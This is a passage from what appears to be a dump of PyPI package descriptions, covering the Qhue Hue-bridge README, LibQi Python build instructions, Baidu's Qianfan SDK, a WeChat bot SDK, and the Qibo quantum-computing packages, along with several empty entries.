are:>>>forkinb():print(k)lightsgroupsconfigschedulesscenesrulessensorsresourcelinksand you can explore within these lower levels too:>>>forkinb.sensors():print(k)12458...OK, let's think about URLs again.Ideally, we'd like to be able to construct all of our URLs the same way we did above, so we would refer to light 1 asb.lights.1, for example. But this bumps up against a limitation of Python: you can't use numbers as attribute names. Nor can you use variables. So we couldn't get lightnby requestingb.lights.neither.As an alternative, therefore, Qhue will also let you use dictionary key syntax - for example,b.lights[1]orb.lights[n].# Get information about light 1print(b.lights[1]())# or, to do the same thing another way:print(b['lights'][1]())Alternatively, when youcalla resource, you can give it arguments, which will be added to its URL when making the call:# This is the same as the last examples:print(b('lights',1))So there are several ways to express the same thing, and you can choose the one which fits most elegantly into your code.Here's another example, and instead of lights, we'll use sensors (switches, motion sensors etc). This one-liner will tell you where people are moving about:>>> [s['name'] for s in b.sensors().values() if s['state'].get('presence')]\n[\"Quentin's study\", \"Hall\", \"Kitchen\"]Let's explain that one-liner, by way of revision:b.sensorsis a Resource representing your sensors, sob.sensors()will make an API call and get back a dict of information about all your sensors, indexed by their ID. We don't care about the ID keys here, so we useb.sensors().values()to get a list containing just the data about each sensor.Each item in this list is a dict which will include a 'name' and a 'state', and if the state includes a 'presence' with a true value, then it is a motion sensor which is detecting movement.Making changesNow, to make a change to a value, such as the brightness of a bulb, you also call the resource, but you add keyword arguments to specify the properties you want to change. You can change the brightness and hue of a light by setting properties on itsstate, for example:b.lights[1].state(bri=128,hue=9000)and you can mix URL-constructing positional arguments with value-setting keyword arguments, if you like:# Positional arguments are added to the URL.# Keyword arguments change values.# So these are equivalent to the previous example:b.lights(1,'state',bri=128,hue=9000)b('lights',1,'state',bri=128,hue=9000)When you need to specify boolean true/false values, you should use the native Python True and False.As a more complex example, if you want to set the brightness and colour temperature of a light in a given scene, you might use a call like this:bridge.scenes[scene].lightstates[light](on=True,bri=bri,ct=ct)The above examples cover most simple cases.If you don't have any keyword arguments, the HTTP request will be a GET, and will tell you about the current status. If you do have keyword arguments, it will become a PUT, and it will change the current status.Sometimes, though, you need to specify a POST or a DELETE, and you can do so with the specialhttp_methodargument, which will override the above rule:# Delete rule 1b('rules',1,http_method='delete')If you need to specify a keyword argument that would conflict with a Python keyword, such asclass, simply append an underscore to it, like this:# Set property \"class\" to \"Hallway\".# The trailing underscore will automatically be removed# in the property name sent to the bridge.b.groups[19](class_='Hallway')Finally, for certain operations, like schedules and rules, you'll want to know the 'address' of a resource, which is the absolute URL path - the bit after the IP address, or, more recently, the bit after the username. You can get these with theaddressandshort_addressattributes:>>>b.groups[1].url'http://192.168.0.45/api/ac594202624a7211ac44615430a461/groups/1'>>>b.groups[1].address'/api/ac594202624a7211ac44615430a461/groups/1'>>>b.groups[1].short_address'/groups/1'See the API docs for more information about when you need this.And, at present, that's about it.A couple of hintsSome of the requests can return large amounts of information. A handy way to make it more readable is to format it as YAML. You may need topip install PyYAML, then try the following:importyamlprint(yaml.safe_dump(bridge.groups(),indent=4))The Bridge generally returns items in a reasonably logical order. The order is not actually important, but if you wish to preserve it, then you probablydon'twant the JSON structures turned into Python dicts, since these do not generally preserve ordering. When you construct the Bridge object, you can tell it to use another function to turn JSON dictionaries into Python structures, for example by specifyingobject_pairs_hook=collections.OrderedDict. This will give you OrderedDicts instead of dicts, which is a benefit in almost every way, except that any YAML output you create from it won't look so nice.If you're familiar with the Jupyter (iPython) Notebook system, it can be a fun way to explore the API. See theQhue Playground example notebook.If there is an error, aQhueExceptionwill be raised. If the error was returned from the API call, as described inthe documentation, it will have a type and address field as well as the human-readable message, making it easier, for example, to ignore certain types of error.Creating a userIf you haven't used the API before, you'll need to create a user account on the bridge.fromqhueimportcreate_new_usernameusername=create_new_username(\"192.168.0.45\")You'll get a prompt saying that the link button on the bridge needs to be pressed. Go and press it, and you should get a generated username. You can now get a new Bridge object as shown in the examples above, passing this username as the second argument.Please have a look at the examples directory for a method to store the username for future sessions.Usage notesPlease note that qhue won't do any local checking of any method calls or arguments - it just packages up what you give it and sends it to the bridge.An important example of this is that the bridge is expecting integer values for things like colour temperature and brightness. If, say, you do a calculation for your colour which returns a float, you need to convert that to an int before sending or it will be ignored. (Sending a string returns an error, but sending a float does not.)PrerequisitesThis requires Python 3. It uses Kenneth Reitz's excellentrequestsmodule, so you'll need to do:pip install requestsor something similar before using Qhue. If you installed Qhue itself using pip, this shouldn't be necessary.Remote accessStarting with version 2, Qhue has a wrapper to support remote access: interacting with your Hue hub via the Philips servers when you are at a remote location, in the same way that a phone app might do when you are away from home.For more information see [[README-remote.md]].LicenceThis little snippet is distributed under the GPL v2. See the LICENSE file. (They spell it that way on the other side of the pond.) It comes with no warranties, express or implied, but just with the hope that it may be useful to someone.ContributingSuggestions, patches, pull requests welcome. There are many ways this could be improved.If you can do so in a general way, without adding too many lines, that would be even better! Brevity, as Polonius said, is the soul of wit.Many thanks to John Bond, Sander Johansson, Travis Evans, David Coles, Chris Macklin, Andrea Jemmett, Martin Paulus, Ryan Turner, Matthew Clapp, Marcus Klaas de Vries and Richard Morrison, amongst others, for their contributions!Quentin Stafford-Fraser"} +{"package": "qhwjbfuhbqfiuhbqe", "pacakge-description": "No description available on PyPI."} +{"package": "qhxc-api", "pacakge-description": "No description available on PyPI."} +{"package": "qhyper", "pacakge-description": "A package that allows to build and solve quantum and classical problems using predefined solvers and problems."} +{"package": "qi", "pacakge-description": "This repository contains the official Python bindings of theLibQi, theqiPython module.BuildingTo build the project, you need:a compiler that supports C++17.on Ubuntu:apt-get install build-essential.CMake with at least version 3.23.on PyPI (recommended):pip install \u201ccmake>=3.23\u201d.on Ubuntu:apt-get install cmake.Python with at least version 3.7 and its development libraries.On Ubuntu:apt-get install libpython3-dev.a Pythonvirtualenv.On Ubuntu:apt-get install python3-venv\npython3 -m venv ~/my-venv # Use the path of your convenience.\nsource ~/my-venv/bin/activateNoteThe CMake project offers several configuration options and exports a set\nof targets when installed. You may refer to theCMakeLists.txtfile\nfor more details about available parameters and exported targets.NoteThe procedures described below assume that you have downloaded the project\nsources, that your current working directory is the project sources root\ndirectory and that you are working inside your virtualenv.ConanAdditionally,libqi-pythonis available as a Conan 2 project, which means you\ncan use Conan to fetch dependencies.You can install and/or upgrade Conan 2 and create a default profile in the\nfollowing way:#install/upgradeConan2pip install --upgrade conan~=2#createadefaultprofileconan profile detectInstall dependencies from Conan and build with CMakeThe procedure to build the project using Conan to fetch dependencies is the\nfollowing.Most dependencies are available on Conan Center repository and should not\nrequire any additional steps to make them available. However, you might need to\nfirst get and export thelibqirecipe into your local Conan cache.#GitHubisavailable,butyoucanalsouseinternalGitLab.QI_REPOSITORY=\"https://github.com/aldebaran/libqi.git\"\nQI_VERSION=\"4.0.1\" # Checkout the version your project need.\nQI_PATH=\"$HOME/libqi\" # Or whatever path you want.\ngit clone \\\n --depth=1 `# Only fetch one commit.` \\\n --branch \"qi-framework-v${QI_VERSION}\" \\\n \"${QI_REPOSITORY}\" \\\n \"${QI_PATH}\"\nconan export \"${QI_PATH}\" \\\n --version \"${QI_VERSION}\" # Technically not required but some#versionsoflibqirequireit#becauseofabug.You can then install thelibqi-pythondependencies in Conan.conan install . \\\n --build=missing `# Build dependencies binaries that are missing in Conan.` \\\n -s build_type=Debug `# Build in debug mode.` \\\n -c tools.build:skip_test=true `# Skip tests building for dependencies.` \\\n -c '&:tools.build:skip_test=false' # Do not skip tests for the project.This will generate a build directory containing a configuration with a\ntoolchain file that allows CMake to find dependencies inside the Conan cache.You can then invoke CMake directly inside the build configuration directory to\nconfigure and build the project. Fortunately, Conan also generates a CMake\npreset that simplifies the process. The name of the preset may differ on\nyour machine. You may need to find the preset generated by Conan first by\ncalling:cmake --list-presetsHere, we\u2019ll assume that the preset is namedconan-linux-x86_64-gcc-debug.\nTo start building, you need to configure with CMake and then build:cmake --preset conan-linux-x86_64-gcc-debug\ncmake --build --preset conan-linux-x86_64-gcc-debugTests can now be invoked usingCTest, but they require a runtime environment\nfrom Conan so that all dependencies are found:source build/linux-x86_64-gcc-debug/generators/conanrun.sh\nctest --preset conan-linux-x86_64-gcc-debug --output-on-failure\nsource build/linux-x86_64-gcc-debug/generators/deactivate_conanrun.shFinally, you can install the project in the directory of your choice.The project defines a single install component, theModulecomponent.#`cmake--install`doesnotsupportpresetssadly.cmake \\\n --install build/linux-x86_64-gcc-debug \\\n --component Module --prefix ~/my-libqi-python-installWheel (PEP 517)You may build this project as a wheel package using PEP 517.It uses ascikit-buildbackend which interfaces with CMake.You may need to provide a toolchain file so that CMake finds the required\ndependencies, such as a toolchain generated by Conan:conan install . \\\n --build=missing `# Build dependencies binaries that are missing in Conan.` \\\n -c tools.build:skip_test=true # Skip any test.You now can use thebuildPython module to build the wheel using PEP 517.pip install -U build\npython -m build \\\n --config-setting cmake.define.CMAKE_TOOLCHAIN_FILE=$PWD/build/linux-x86_64-gcc-release/generators/conan_toolchain.cmakeWhen built that way, the native libraries present in the wheel are most likely incomplete.\nYou will need to useauditwheelordelocateto fix it.Noteauditwheelrequires thepatchelfutility program on Linux. You may need\nto install it (on Ubuntu:apt-get install patchelf).pip install -U auditwheel # or `delocate` on MacOS.\nauditwheel repair \\\n --strip `# Strip debugging symbols to get a lighter archive.` \\\n `# The desired platform, which may differ depending on your build host.` \\\n `# With Ubuntu 20.04, we can target manylinux_2_31. Newer versions of` \\\n `# Ubuntu will have to target newer versions of manylinux.` \\\n `# If you don't need a manylinux archive, you can also target the` \\\n `# 'linux_x86_64' platform.` \\\n --plat manylinux_2_31_x86_64 \\\n `# Path to the wheel archive.` \\\n dist/qi-*.whl#Thewheelwillbebydefaultplacedina`./wheelhouse/`directory.CrosscompilingThe project supports cross-compiling as explained in theCMake manual about\ntoolchains. You may simply set theCMAKE_TOOLCHAIN_FILEvariable to the\npath of the CMake file of your toolchain."} +{"package": "qia", "pacakge-description": "qiaAutomated testing tool for Web and Mobile with Python."} +{"package": "qian", "pacakge-description": "Quantitative Investment Algorithm Nexus (QIAN)\"Nexus\" is a term that refers to a connection, link, or central point of intersection. In the context of the acronym, it signifies the integration and interconnectedness of the various quantitative investment algorithms that Qian Capital runs. It represents the idea of algorithms coming together as a cohesive unit, forming a central hub or network, where they collaborate and interact to generate investment insights and drive decision-making. The term \"nexus\" conveys the notion of a powerful and dynamic network of algorithms working in synergy to analyze data, identify patterns, and optimize investment strategies. For Qian Capital, QIAN represents, and is the name of, our flagship super-intelligent AI trader that accounts for all of Qian Capital's quantitative investing algorithms, including all of the sub-models, inputs, etc. QIAN is the super-intelligent AGI that makes the final alpha generation, portfolio optimization, execution decisions."} +{"package": "qianfan", "pacakge-description": "\u767e\u5ea6\u5343\u5e06\u5927\u6a21\u578b\u5e73\u53f0 SDKDocumentation|GitHub|Cookbook\u9488\u5bf9\u767e\u5ea6\u667a\u80fd\u4e91\u5343\u5e06\u5927\u6a21\u578b\u5e73\u53f0\uff0c\u6211\u4eec\u63a8\u51fa\u4e86\u4e00\u5957 Python SDK\uff08\u4e0b\u79f0\u5343\u5e06 SDK\uff09\uff0c\u65b9\u4fbf\u7528\u6237\u901a\u8fc7\u4ee3\u7801\u63a5\u5165\u5e76\u8c03\u7528\u5343\u5e06\u5927\u6a21\u578b\u5e73\u53f0\u7684\u80fd\u529b\u3002\u5982\u4f55\u5b89\u88c5\u76ee\u524d\u5343\u5e06 SDK \u5df2\u53d1\u5e03\u5230 PyPI \uff0c\u7528\u6237\u53ef\u4f7f\u7528 pip \u547d\u4ee4\u8fdb\u884c\u5b89\u88c5\u3002\u5b89\u88c5\u5343\u5e06 SDK \u9700\u8981 3.7.0 \u6216\u66f4\u9ad8\u7684 Python \u7248\u672cpip install qianfan\u5728\u5b89\u88c5\u5b8c\u6210\u540e\uff0c\u7528\u6237\u5373\u53ef\u5728\u4ee3\u7801\u5185\u5f15\u5165\u5343\u5e06 SDK \u5e76\u4f7f\u7528importqianfan\u5feb\u901f\u4f7f\u7528\u5728\u4f7f\u7528\u5343\u5e06 SDK \u4e4b\u524d\uff0c\u7528\u6237\u9700\u8981\u767e\u5ea6\u667a\u80fd\u4e91\u63a7\u5236\u53f0 - \u5b89\u5168\u8ba4\u8bc1\u9875\u9762\u83b7\u53d6 Access Key \u4e0e Secret Key\uff0c\u5e76\u5728\u5343\u5e06\u63a7\u5236\u53f0\u4e2d\u521b\u5efa\u5e94\u7528\uff0c\u9009\u62e9\u9700\u8981\u542f\u7528\u7684\u670d\u52a1\uff0c\u5177\u4f53\u6d41\u7a0b\u53c2\u89c1\u5e73\u53f0\u8bf4\u660e\u6587\u6863\u3002\u5728\u83b7\u5f97\u4e86 Access Key \u4e0e Secret Key \u540e\uff0c\u7528\u6237\u5373\u53ef\u5f00\u59cb\u4f7f\u7528 SDK\uff1aimportosimportqianfanos.environ[\"QIANFAN_ACCESS_KEY\"]=\"...\"os.environ[\"QIANFAN_SECRET_KEY\"]=\"...\"chat_comp=qianfan.ChatCompletion(model=\"ERNIE-Bot\")resp=chat_comp.do(messages=[{\"role\":\"user\",\"content\":\"\u4f60\u597d\uff0c\u5343\u5e06\"}],top_p=0.8,temperature=0.9,penalty_score=1.0)print(resp[\"result\"])\u9664\u4e86\u901a\u8fc7\u73af\u5883\u53d8\u91cf\u8bbe\u7f6e\u5916\uff0c\u5343\u5e06 SDK \u8fd8\u63d0\u4f9b\u4e86.env\u6587\u4ef6\u548c\u901a\u8fc7\u4ee3\u7801\u914d\u7f6e\u7684\u65b9\u5f0f\uff0c\u8be6\u7ec6\u53c2\u89c1SDK \u914d\u7f6e\u90e8\u5206\u3002\u9664\u4e86\u6a21\u578b\u8c03\u7528\u5916\uff0c\u5343\u5e06 SDK \u8fd8\u63d0\u4f9b\u6a21\u578b\u8bad\u7ec3\u3001\u6570\u636e\u7ba1\u7406\u7b49\u8bf8\u591a\u529f\u80fd\uff0c\u5982\u4f55\u4f7f\u7528\u8bf7\u53c2\u8003SDK \u4f7f\u7528\u6587\u6863\u3002\u5176\u4ed6\u8ba4\u8bc1\u65b9\u5f0f\u8fd9\u91cc\u662f\u4e00\u4e9b\u5176\u4ed6\u8ba4\u8bc1\u65b9\u5f0f\uff0c\u8bf7\u4ec5\u5728\u65e0\u6cd5\u83b7\u53d6 Access Key \u4e0e Secret Key \u65f6\u4f7f\u7528\u3002\u8fd9\u4e9b\u8ba4\u8bc1\u65b9\u5f0f\u5df2\u7ecf\u8fc7\u65f6\uff0c\u5c06\u5728\u672a\u6765\u4ece SDK \u4e2d\u79fb\u9664\u3002API Key (AK) \u548c Secret Key (SK\uff09\u662f\u7528\u6237\u5728\u8c03\u7528\u5343\u5e06\u6a21\u578b\u76f8\u5173\u529f\u80fd\u65f6\u6240\u9700\u8981\u7684\u51ed\u8bc1\u3002\u5177\u4f53\u83b7\u53d6\u6d41\u7a0b\u53c2\u89c1\u5e73\u53f0\u7684\u5e94\u7528\u63a5\u5165\u4f7f\u7528\u8bf4\u660e\u6587\u6863\uff0c\u4f46\u8be5\u8ba4\u8bc1\u65b9\u5f0f\u65e0\u6cd5\u4f7f\u7528\u8bad\u7ec3\u3001\u53d1\u5e03\u6a21\u578b\u7b49\u529f\u80fd\uff0c\u82e5\u9700\u4f7f\u7528\u8bf7\u4f7f\u7528 Access Key \u548c Secret Key \u7684\u65b9\u5f0f\u8fdb\u884c\u8ba4\u8bc1\u3002\u5728\u83b7\u5f97\u5e76\u914d\u7f6e\u4e86 AK \u4ee5\u53ca SK \u540e\uff0c\u7528\u6237\u5373\u53ef\u5f00\u59cb\u4f7f\u7528 SDK\uff1aimportosimportqianfanos.environ[\"QIANFAN_AK\"]=\"...\"os.environ[\"QIANFAN_SK\"]=\"...\"chat_comp=qianfan.ChatCompletion(model=\"ERNIE-Bot\")resp=chat_comp.do(messages=[{\"role\":\"user\",\"content\":\"\u4f60\u597d\uff0c\u5343\u5e06\"}],top_p=0.8,temperature=0.9,penalty_score=1.0)print(resp[\"result\"])\u9002\u7528\u8303\u56f4\uff1a\u529f\u80fdAPI KeyAccess KeyChat \u5bf9\u8bdd\u2705\u2705Completion \u7eed\u5199\u2705\u2705Embedding \u5411\u91cf\u5316\u2705\u2705Plugin \u63d2\u4ef6\u8c03\u7528\u2705\u2705\u6587\u751f\u56fe\u2705\u2705\u5927\u6a21\u578b\u8c03\u4f18\u274c\u2705\u5927\u6a21\u578b\u7ba1\u7406\u274c\u2705\u5927\u6a21\u578b\u670d\u52a1\u274c\u2705\u6570\u636e\u96c6\u7ba1\u7406\u274c\u2705\u529f\u80fd\u5bfc\u89c8\u5343\u5e06\u5e73\u53f0\u63d0\u4f9b\u4e86\u5927\u6a21\u578b\u76f8\u5173\u7684\u8bf8\u591a\u80fd\u529b\uff0cSDK \u63d0\u4f9b\u4e86\u5bf9\u5404\u80fd\u529b\u7684\u8c03\u7528\uff0c\u5177\u4f53\u4ecb\u7ecd\u53ef\u4ee5\u67e5\u770bSDK \u6587\u6863\u6216\u8005GitHub \u4ed3\u5e93\u3002\u5927\u6a21\u578b\u80fd\u529b[Doc][GitHub]Chat \u5bf9\u8bddCompletion \u7eed\u5199Embedding \u5411\u91cf\u5316Plugin \u63d2\u4ef6\u8c03\u7528Text2Image \u6587\u751f\u56fe\u6a21\u578b\u8c03\u4f18[Doc][GitHub]\u6a21\u578b\u7ba1\u7406[Doc][GitHub]\u6a21\u578b\u670d\u52a1[Doc][GitHub]\u6570\u636e\u96c6\u7ba1\u7406[Doc][GitHub]Prompt \u7ba1\u7406[Doc][GitHub]\u5176\u4ed6Tokenizer [Doc][GitHub]\u63a5\u53e3\u6d41\u63a7 [Doc][GitHub]\u8fd8\u53ef\u4ee5\u901a\u8fc7API References\u67e5\u770b\u6bcf\u4e2a\u63a5\u53e3\u7684\u8be6\u7ec6\u8bf4\u660e\u3002\u8054\u7cfb\u6211\u4eec\u5982\u4f7f\u7528\u8fc7\u7a0b\u4e2d\u9047\u5230\u4ec0\u4e48\u95ee\u9898\uff0c\u6216\u5bf9SDK\u529f\u80fd\u6709\u5efa\u8bae\uff0c\u53ef\u901a\u8fc7\u5982\u4e0b\u65b9\u5f0f\u8054\u7cfb\u6211\u4eecGitHub issues\u767e\u5ea6\u667a\u80fd\u4e91\u5de5\u5355\uff08\u767e\u5ea6\u4e13\u5bb6\u5373\u65f6\u670d\u52a1\uff09LicenseApache-2.0"} +{"package": "qiang-distributions", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qianghua-evn", "pacakge-description": "No description available on PyPI."} +{"package": "qiangl", "pacakge-description": "Example PackageThis is a simple example package. You can useGithub-flavored Markdownto write your content."} +{"package": "qianglie", "pacakge-description": "\u5899\u88c2\u5730\u5740\u53d1\u5e03\u9875 \u00b7\u5899\u88c2\u6c38\u4e45\u57df\u540d\uff1ahttps://www.qianglie.com\u5173\u6ce8\u5899\u88c2\u63a8\u7279\uff1a@QiangLie\u6c38\u4e45\u57df\u540d\u88ab\u5927\u9646\u5730\u533a\u5c01\u9501\uff0c\u8bf7\u901a\u8fc7VPN\u6216\u4ee5\u4e0b\u65b9\u5f0f\u8bbf\u95ee\u5899\u88c2\u83b7\u53d6\u6700\u65b0\u57df\u540d\u53ef\u4ee5\u53d1\u9001\u90ae\u4ef6\u81f3qianglie@mail.com\u8bf7\u628a\u8fd9\u9875\u5185\u5bb9\u590d\u5236\u5230\u4f60\u7684\u8bb0\u4e8b\u672c\u4e0a\u6216\u59a5\u5584\u4fdd\u5b58\u5728\u5176\u4ed6\u5730\u65b9\u6bd4\u5982\u6709\u9053\u4e91\u7b14\u8bb0\uff0c\u4ee5\u514d\u627e\u4e0d\u5230\u6211\u4eec\uff01\u9632\u5c4f\u853d\u5730\u5740\uff1ahttps://cdn.qianglie.biz\u5907\u7528\u5730\u5740\uff08\u6bcf\u65e5\u66f4\u65b0\uff09\uff1ahttps://vk.com/qianglie\u5982\u679c\u56e0\u5404\u79cd\u539f\u56e0\uff0c\u4ee5\u4e0a\u65b9\u6cd5\u90fd\u4e0d\u884c\uff0c\u53ef\u4ee5\u53d1\u9001\u90ae\u4ef6\u5230 qianglie#vk.com # \u6362\u6210 @ \uff0c\u7d22\u53d6\u6700\u65b0\u5730\u5740\u3002"} +{"package": "qiankun", "pacakge-description": "No description available on PyPI."} +{"package": "qianqiucloudsdk", "pacakge-description": "No description available on PyPI."} +{"package": "qianqiuyun", "pacakge-description": "qianqiuyun python sdk"} +{"package": "qianxun-wechat-sdk", "pacakge-description": "\u5343\u5bfb\u5fae\u4fe1\u6846\u67b6\u7684 Python SDK\u4ecb\u7ecd\u5343\u5bfb\u5fae\u4fe1\u6846\u67b6\u7684 Python SDK\uff0c\u57fa\u4e8e\u5343\u5bfb\u5fae\u4fe1\u6846\u67b6\u7684 HTTP API \u63a5\u53e3\uff0c\u5c01\u88c5\u4e86\u4e00\u4e9b\u5e38\u7528\u7684\u63a5\u53e3\uff0c\u65b9\u4fbf\u5f00\u53d1\u8005\u4f7f\u7528\u3002\u5b89\u88c5pipinstallqianxun-wechat-sdk\u4f7f\u7528\u793a\u4f8bimportqianxun.EmojiasEmoji# \u5bfc\u5165 qianxun Emoji \u8868\u60c5\u6a21\u5757fromqianxun.SDKimportRobot# \u5bfc\u5165 qianxun SDK \u6846\u67b6# \u521b\u5efa\u4e00\u4e2a\u56de\u8c03\u51fd\u6570\u6765\u63a5\u6536 qianxun \u6846\u67b6\u7684\u56de\u8c03\u4e8b\u4ef6defcallback(request):print('='*50+'\u56de\u8c03\u4e8b\u4ef6'+'='*50,end='\\n\\n')print(request)ifrequest['event']==10014:print('\u8d26\u53f7\u53d8\u52a8\u4e8b\u4ef6(10014)')ifrequest['event']==10008:print('\u6536\u5230\u7fa4\u804a\u6d88\u606f(10008)')ifrequest['event']==10009:print('\u6536\u5230\u79c1\u804a\u6d88\u606f(10009)')ifrequest['event']==10010:print('\u81ea\u5df1\u53d1\u51fa\u6d88\u606f(10010)')ifrequest['event']==10006:print('\u6536\u5230\u8f6c\u8d26\u4e8b\u4ef6(10006)')ifrequest['event']==10013:print('\u64a4\u56de\u4e8b\u4ef6(10013)')ifrequest['event']==10011:print('\u597d\u53cb\u8bf7\u6c42(10011)')ifrequest['event']==10007:print('\u652f\u4ed8\u4e8b\u4ef6(10007)')if__name__=='__main__':# \u521b\u5efa\u4e00\u4e2a\u673a\u5668\u4eba\u5b9e\u4f8b\uff0c\u4f20\u5165\u673a\u5668\u4eba\u7684 ip \u548c\u7aef\u53e3\uff0c\u4ee5\u53ca\u673a\u5668\u4eba\u7684 wxid (\u53ef\u9009)robot=Robot(host='127.0.0.1',port=7777,bot_wxid='')# \u8c03\u7528\u673a\u5668\u4eba\u7684\u767b\u5f55\u63a5\u53e3, \u83b7\u53d6\u673a\u5668\u4eba\u7684 wxidrobot.bot_wxid=robot.getWeChatList()['result'][0]['wxid']# \u521b\u5efa\u4e00\u4e2a\u673a\u5668\u4eba\u7684\u56de\u8c03\u4e8b\u4ef6\uff0c\u4f20\u5165\u56de\u8c03\u51fd\u6570\u548c\u7aef\u53e3robot.callbackEvents(callback_fun=callback,port=5000)# \u8c03\u7528\u673a\u5668\u4eba\u7684\u53d1\u9001\u6587\u672c\u6d88\u606f\u63a5\u53e3\uff0c\u4f20\u5165\u673a\u5668\u4eba\u7684 wxid \u548c\u6d88\u606f\u5185\u5bb9robot.sendTextMessage(wxid='filehelper',msg=f'\u4f60\u597d{Emoji.\u5c0f\u4e11\u8138}\u6d4b\u8bd5{Emoji.\u8868\u60c5_\u6342\u8138}')"} +{"package": "qianyan", "pacakge-description": "No description available on PyPI."} +{"package": "qianyan-test", "pacakge-description": "No description available on PyPI."} +{"package": "qianyantest1", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qianyan-test1", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qianyantest2", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qianyan-test4", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qianyantest5", "pacakge-description": "No description available on PyPI."} +{"package": "qianyan-test5", "pacakge-description": "No description available on PyPI."} +{"package": "qianyantest6", "pacakge-description": "No description available on PyPI."} +{"package": "qianyantest7", "pacakge-description": "No description available on PyPI."} +{"package": "qianyantest8", "pacakge-description": "No description available on PyPI."} +{"package": "qiaotest2022", "pacakge-description": "No description available on PyPI."} +{"package": "qib", "pacakge-description": "Python package for quantum circuits and algorithms.InstallationTo install qib, clone or download theonline repositoryand install it in development mode viapython3-mpipinstall-eDocumentationSource code documentation is available atqib.readthedocs.io."} +{"package": "qibo", "pacakge-description": "Qibo is an open-source full stack API for quantum simulation and quantum hardware control.Some of the key features of Qibo are:Definition of a standard language for the construction and execution of quantum circuits with device agnostic approach to simulation and quantum hardware control based on plug and play backend drivers.A continuously growing code-base of quantum algorithms applications presented with examples and tutorials.Efficient simulation backends with GPU, multi-GPU and CPU with multi-threading support.Simple mechanism for the implementation of new simulation and hardware backend drivers.DocumentationQibo documentation is availablehere.Minimum Working ExamplesA simpleQuantum Fourier Transform (QFT)example to test your installation:fromqibo.modelsimportQFT# Create a QFT circuit with 15 qubitscircuit=QFT(15)# Simulate final state wavefunction default initial state is |00>final_state=circuit()Here another example with more gates and shots simulation:importnumpyasnpfromqiboimportCircuit,gatesc=Circuit(2)c.add(gates.X(0))# Add a measurement register on both qubitsc.add(gates.M(0,1))# Execute the circuit with the default initial state |00>.result=c(nshots=100)In both cases, the simulation will run in a single device CPU or GPU in double precisioncomplex128.Citation policyIf you use the package please refer tothe documentationfor citation instructions.ContactsTo get in touch with the community and the developers, consider joining the Qibo workspace on Matrix:https://matrix.to/#/#qibo:matrix.orgSupporters and collaboratorsQuantum Research Center, Technology Innovation Institute (TII), United Arab EmiratesUniversit\u00e0 degli Studi di Milano (UNIMI), Italy.Istituto Nazionale di Fisica Nucleare (INFN), Italy.Universit\u00e0 degli Studi di Milano-Bicocca (UNIMIB), Italy.European Organization for Nuclear research (CERN), Switzerland.Universitat de Barcelona (UB), Spain.Barcelona Supercomputing Center (BSC), Spain.Qilimanjaro Quantum Tech, Spain.Centre for Quantum Technologies (CQT), Singapore.Institute of High Performance Computing (IHPC), Singapore.National Supercomputing Centre (NSCC), Singapore.RIKEN Center for Computational Science (R-CCS), Japan.NVIDIA (cuQuantum), USA."} +{"package": "qibocal", "pacakge-description": "QibocalQibocal provides Quantum Characterization Validation and Verification protocols usingQiboandQibolab.Qibocal key features:Automatization of calibration protocols.Declarative inputs using runcard.Generation of a report.DocumentationQibocal documentation is availablehere.InstallationThe package can be installed by source:gitclonehttps://github.com/qiboteam/qibocal.gitcdqibocal\npipinstall.Developer instructionsFor development make sure to install the package usingpoetryand to install the pre-commit hooks:gitclonehttps://github.com/qiboteam/qibocal.gitcdqibocal\npoetryinstall\npre-commitinstallMinimal working exampleThis section shows the steps to perform a resonator spectroscopy with Qibocal.Write a runcardA runcard contains all the essential information to run a specific task.\nFor our purposes, we can use the following:platform: tii1q\n\nqubits: [0]\n\n- id: resonator spectroscopy high power\n priority: 0\n operation: resonator_spectroscopy\n parameters:\n freq_width: 10_000_000\n freq_step: 500_000\n amplitude: 0.4\n power_level: high\n nshots: 1024\n relaxation_time: 0How to run protocolsTo run the protocols specified in theruncard, Qibocal uses theqq autocommandqqauto-oifis specified, the results will be saved in it, otherwiseqqwill automatically create a default folder containing the current date and the username.Uploading reports to serverIn order to upload the report to a centralized server, send to the server administrators your public ssh key (from the machine(s) you are planning to upload the report) and then use theqq upload command. This program will upload your report to the server and generate an unique URL.ContributingContributions, issues and feature requests are welcome!\nFeel free to checkCitation policyIf you use the package please refer tothe documentationfor citation instructions"} +{"package": "qibochem", "pacakge-description": "QibochemQibochem is a plugin toQibofor quantum chemistry simulations.Some of the features of Qibochem are:General purposeMoleculeclassPySCF for calculating the molecular 1- and 2-electron integralsUser defined orbital active spaceUnitary Coupled Cluster AnsatzVarious Qibo backends (numpy, JIT, TN) for efficient simulationDocumentationThe Qibochem documentation can be foundhereMinimum working example:An example of building the UCCD ansatz with a H2 moleculeimport numpy as np\nfrom qibo.models import VQE\n\nfrom qibochem.driver.molecule import Molecule\nfrom qibochem.ansatz.hf_reference import hf_circuit\nfrom qibochem.ansatz.ucc import ucc_circuit\n\n# Define the H2 molecule and obtain its 1-/2- electron integrals with PySCF\nh2 = Molecule([('H', (0.0, 0.0, 0.0)), ('H', (0.0, 0.0, 0.7))])\nh2.run_pyscf()\n# Generate the molecular Hamiltonian\nhamiltonian = h2.hamiltonian()\n\n# Build a UCC circuit ansatz for running VQE\ncircuit = hf_circuit(h2.nso, sum(h2.nelec))\ncircuit += ucc_circuit(h2.nso, [0, 1, 2, 3])\n\n# Create and run the VQE, starting with random initial parameters\nvqe = VQE(circuit, hamiltonian)\n\ninitial_parameters = np.random.uniform(0.0, 2*np.pi, 8)\nbest, params, extra = vqe.minimize(initial_parameters)Citation policyIf you use the Qibochem plugin please refer to the documentation for citation instructions.ContactFor questions, comments and suggestions please contact us athttps://matrix.to/#/#qibo:matrix.orgContributingContributions, issues and feature requests are welcome."} +{"package": "qibo-client", "pacakge-description": "Qibo clientThe documentation of the project can be foundhere.InstallInstall first the package dependencies with the following commands.We recommend to start with a fresh virtual environment to avoid dependencies\nconflicts with previously installed packages.python-mvenv./envsourceactivate./env/bin/activateTheqibo-clientpackage can be installed throughpip:pipinstallqibo-clientQuick startOnce installed, the provider allows to run quantum circuit computations on the\nTiiQ remote server.:warning: Note: to run jobs on the remote cluster it is mandatory to own a\nvalidated account.\nPlease, sign up tothis linkto\nobtain the needed token to run computations on the cluster.The following snippet provides a basic usage example.\nReplace theyour-tii-qrc-tokenstring with your user token received during the\nregistration process.importqiboimportqibo_client# create the circuit you want to 